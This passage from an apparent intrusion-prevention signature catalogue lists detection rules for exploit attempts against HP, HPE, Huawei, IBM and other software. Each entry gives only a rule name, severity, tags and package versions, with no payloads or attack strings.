First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: HP-Sitescope-Emailservlet-Information-Disclosure
Description:
Back to top

HTTP_CRL-HP-Sitescope-Integrationviewer-Default-Credentials

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-514-5211
Vulnerability: HP-Sitescope-Integrationviewer-Default-Credentials
Description:
Back to top

HTTP_CRL-HP-Sitescope-Multiple-Directory-Traversal-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in HP SiteScope detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP SiteScope, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-481-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: HP-Sitescope-Multiple-Directory-Traversal-Vulnerabilities
Description:
Back to top

HTTP_CRL-HP-System-Management-Homepage-Iprange-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP System Management Homepage (SMH) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP System Management Homepage, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1732-5242
Vulnerability: HP-System-Management-Homepage-Iprange-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-HP-System-Management-Homepage-Red2301-Redirecturl-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in HP System Management Homepage (SMH) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP System Management Homepage, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1453-5242
Vulnerability: HP-System-Management-Homepage-Red2301-Redirecturl-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-HP-Web-Jetadmin

About this situation: An attempt to exploit a vulnerability in HP Web JetAdmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Web JetAdmin, CVE2004, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-650-5211
Vulnerability: HP-Web-Jetadmin
Description:
Back to top

HTTP_CRL-HPE-IMC-Center-Webdmdebugservlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: HPE-IMC-Webdmdebugservlet-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-HPE-IMC-Customreporttemplateselectbean-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1192-5242
Last changed: sgpkg-ips-1199-5242
Vulnerability: HPE-IMC-Customreporttemplateselectbean-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-IMC-Deployselectbootrom-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1263-5242
Vulnerability: HPE-IMC-Deployselectbootrom-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-IMC-Devgroupselect-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1261-5242
Vulnerability: HPE-IMC-Devgroupselect-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-IMC-Forwardredirect-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1233-5242
Vulnerability: HPE-IMC-Forwardredirect-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-IMC-Operatorgrouptreeselectbean-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Vulnerability: HPE-IMC-Operatorgrouptreeselectbean-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-IMC-Sshconfig-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1268-5242
Vulnerability: HPE-IMC-Sshconfig-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-IMC-Tvxlanlegendbean-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1226-5242
Vulnerability: HPE-IMC-Tvxlanlegendbean-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Amf3-Externalizable-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1197-5242
Vulnerability: HPE-Intelligent-Management-Center-Amf3-Externalizable-Deserialization
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Bytemessageresource-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1210-5242
Vulnerability: HPE-Intelligent-Management-Center-Bytemessageresource-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Getselinsbean-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HPE iMC PLAT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HPE iMC PLAT, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-992-5242
Last changed: sgpkg-ips-994-5242
Vulnerability: HPE-Intelligent-Management-Center-Getselinsbean-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Iccselectcommand-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: HPE-Intelligent-Management-Center-Iccselectcommand-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Ictexpertdownload-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HPE iMC PLAT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HPE iMC PLAT, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-974-5242
Last changed: sgpkg-ips-974-5242
Vulnerability: HPE-IMC-Ictexpertdownload-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Icttableexporttocsvbean-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1185-5242
Vulnerability: HPE-IMC-Icttableexporttocsvbean-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Plat-Redirectservlet-Parafile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HPE iMC PLAT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HPE iMC PLAT, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-869-5242
Vulnerability: HPE-IMC-Plat-Redirectservlet-Parafile-Directory-Traversal
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Platnavigation-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1185-5242
Last changed: sgpkg-ips-1185-5242
Vulnerability: HPE-Intelligent-Management-Center-Platnavigation-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Primefaces-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1425-5242
Vulnerability: HPE-Intelligent-Management-Center-Primefaces-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Soapconfigbean-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Vulnerability: HPE-Intelligent-Management-Center-Soapconfigbean-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Userselectpagingcontent-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HPE iMC PLAT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HPE iMC PLAT, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-986-5242
Last changed: sgpkg-ips-986-5242
Vulnerability: HPE-IMC-Userselectpagingcontent-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Viewbatchtaskresultdetail-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1188-5242
Vulnerability: HPE-Intelligent-Management-Center-Viewbatchtaskresultdetail-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Intelligent-Management-Center-Wmiconfigcontent-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HPE iMC PLAT detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HPE iMC PLAT, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-977-5242
Last changed: sgpkg-ips-977-5242
Vulnerability: HPE-Intelligent-Management-Center-Wmiconfigcontent-Expression-Language-Injection
Description:
Back to top

HTTP_CRL-HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HPE Moonshot Provisioning Manager Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Moonshot Provisioning Manager Appliance, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1038-5242
Vulnerability: HPE-Moonshot-Provisioning-Manager-Appliance-Server_Response-Directory-Traversal
Description:
Back to top

HTTP_CRL-HPE-Smart-Storage-Administrator-Code-Execution

About this situation: An attempt to exploit a vulnerability in HPE Smart Storage Administrator detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Smart Storage Administrator, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1350-5242
Vulnerability: HPE-Smart-Storage-Administrator-Code-Execution
Description:
Back to top

HTTP_CRL-HPE-Systems-Insight-Manager-Amf-Deserialization-RCE

About this situation: An attempt to exploit a vulnerability in HPE Systems Insight Manager detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, HPE Systems Insight Manager, CVE2020, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: HPE-Systems-Insight-Manager-Amf-Deserialization-RCE
Description:
Back to top

HTTP_CRL-Huawei-HG532n-Command-Injection

About this situation: A Huawei HG532n Command Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Huawei HG532n Routers, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1014-5242
Last changed: sgpkg-ips-1014-5242
Vulnerability: Huawei-HG532n-Command-Injection
Description:
Back to top

HTTP_CRL-Huawei-HG866-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Huawei HG866 routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Huawei HG866 routers, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Huawei-HG866-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Huawei-Router-HG532-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in Huawei router HG532 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Huawei-Router-HG532-Arbitrary-Command-Execution
Description:
Back to top

HTTP_CRL-Hylafax-Faxsurvey-System-Compromise

About this situation: Vulnerable faxsurvey script accessed
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, Hylafax, CVE1999, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-350-4219
Vulnerability: HTTP-Hylafax-Faxsurvey-System-Compromise
Description:
Back to top

HTTP_CRL-IBM-Data-Risk-Manager-Path-Traversal

About this situation: An attempt to exploit a vulnerability in IBM Data Risk Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Data Risk Manager, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: IBM-Data-Risk-Manager-Path-Traversal
Description:
Back to top

HTTP_CRL-IBM-Informix-Dynamic-Server-testconn-Heap-Buffer-Overflow

About this situation: An IBM Informix Dynamic Server testconn Heap Buffer Overflow vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-932-5242
Last changed: sgpkg-ips-932-5242
Vulnerability: IBM-Informix-Dynamic-Server-testconn-Heap-Buffer-Overflow
Description:
Back to top

HTTP_CRL-IBM-Informix-OpenAdmin-Tool-Welcomeservice.php-Command-Execution

About this situation: An attempt to exploit a vulnerability in IBM Informix Dynamic Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Informix Dynamic Server, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Vulnerability: IBM-Informix-OpenAdmin-Tool-Welcomeservice.php-Command-Execution
Description:
Back to top

HTTP_CRL-IBM-Lotus-Domino-HPRAgentName-Parameter-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Lotus Domino detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Lotus Domino, Windows not specific, Lotus Domino not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: IBM-Lotus-Domino-HPRAgentName-Parameter-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-IBM-OpenAdmin-Tool-Soap-welcomeServer-PHP-Code-Execution

About this situation: An IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, IBM OpenAdmin Tool, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1023-5242
Vulnerability: IBM-OpenAdmin-Tool-Soap-welcomeServer-PHP-Code-Execution
Description:
Back to top

HTTP_CRL-IBM-Qradar-Siem-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in IBM QRadar Security Information and Event Manager (SIEM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM QRadar, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Vulnerability: IBM-Qradar-Siem-Authentication-Bypass
Description:
Back to top

HTTP_CRL-IBM-Qradar-Siem-Remotejavascript-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in IBM QRadar Security Information and Event Manager (SIEM) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM QRadar, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Vulnerability: IBM-Qradar-Siem-Remotejavascript-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-IBM-Rational-Focal-Point-Login-Servlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in IBM Rational Focal Point detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Focal Point, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1345-5242
Vulnerability: IBM-Rational-Focal-Point-Login-Servlet-Information-Disclosure
Description:
Back to top

HTTP_CRL-IBM-Spectrum-Protect-Plus-Hfpackage-Command-Injection

About this situation: An attempt to exploit a vulnerability in IBM Spectrum Protect Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Spectrum Protect Plus, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: IBM-Spectrum-Protect-Plus-Hfpackage-Command-Injection
Description:
Back to top

HTTP_CRL-IBM-Spectrum-Protect-Plus-Hostname-Command-Injection

About this situation: An attempt to exploit a vulnerability in IBM Spectrum Protect Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Spectrum Protect Plus, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: IBM-Spectrum-Protect-Plus-Hostname-Command-Injection
Description:
Back to top

HTTP_CRL-IBM-Spectrum-Protect-Plus-Timezone-Command-Injection

About this situation: An attempt to exploit a vulnerability in IBM Spectrum Protect Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Spectrum Protect Plus, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1285-5242
Last changed: sgpkg-ips-1285-5242
Vulnerability: IBM-Spectrum-Protect-Plus-Timezone-Command-Injection
Description:
Back to top

HTTP_CRL-IBM-Tivoli-Endpoint-Manager-Web-Reports-Scheduleparam-XSS

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Endpoint Manager, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1440-5242
Vulnerability: IBM-Tivoli-Endpoint-Manager-Web-Reports-Scheduleparam-XSS
Description:
Back to top

HTTP_CRL-IBM-Tivoli-Provisioning-Manager-Express-Asset.getMimeType-SQL-Injection

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Provisioning Manager Express for Software Distribution, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1758-5242
Vulnerability: IBM-Tivoli-Provisioning-Manager-Express-Asset.getMimeType-SQL-Injection
Description:
Back to top

HTTP_CRL-IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Provisioning Manager Express for Software Distribution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Provisioning Manager Express for Software Distribution, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: IBM-Tivoli-Provisioning-Manager-Express-User.updateuservalue-SQL-Injection
Description:
Back to top

HTTP_CRL-IBM-WebSphere-Application-Server-Authentication-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in the authentication process of IBM WebSphere Application Server
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM WebSphere Application Server, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-513-5211
Vulnerability: IBM-WebSphere-Application-Server-Authentication-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Icingaweb-Directory-Traversal-In-Static-Library-File-Requests

About this situation: An attempt to exploit a vulnerability in Icingaweb detected.
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, Icingaweb, CVE2022, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Icingaweb-Directory-Traversal-In-Static-Library-File-Requests
Description:
Back to top

HTTP_CRL-Iconv-ISO-2022-CN-EXT-Buffer-Overflow-CVE-2024-2961

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Iconv-ISO-2022-CN-EXT-Buffer-Overflow-CVE-2024-2961
Description:
Back to top

HTTP_CRL-ICSCADA-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ICSCADA detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ICSCADA, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: ICSCADA-SQL-Injection
Description:
Back to top

HTTP_CRL-Ids-Evading-Attempt

About this situation: An attempt to evade IDS was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

HTTP_CRL-Ignite-Realtime-OpenFire-Group-summary.jsp-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Ignite Realtime Openfire detected
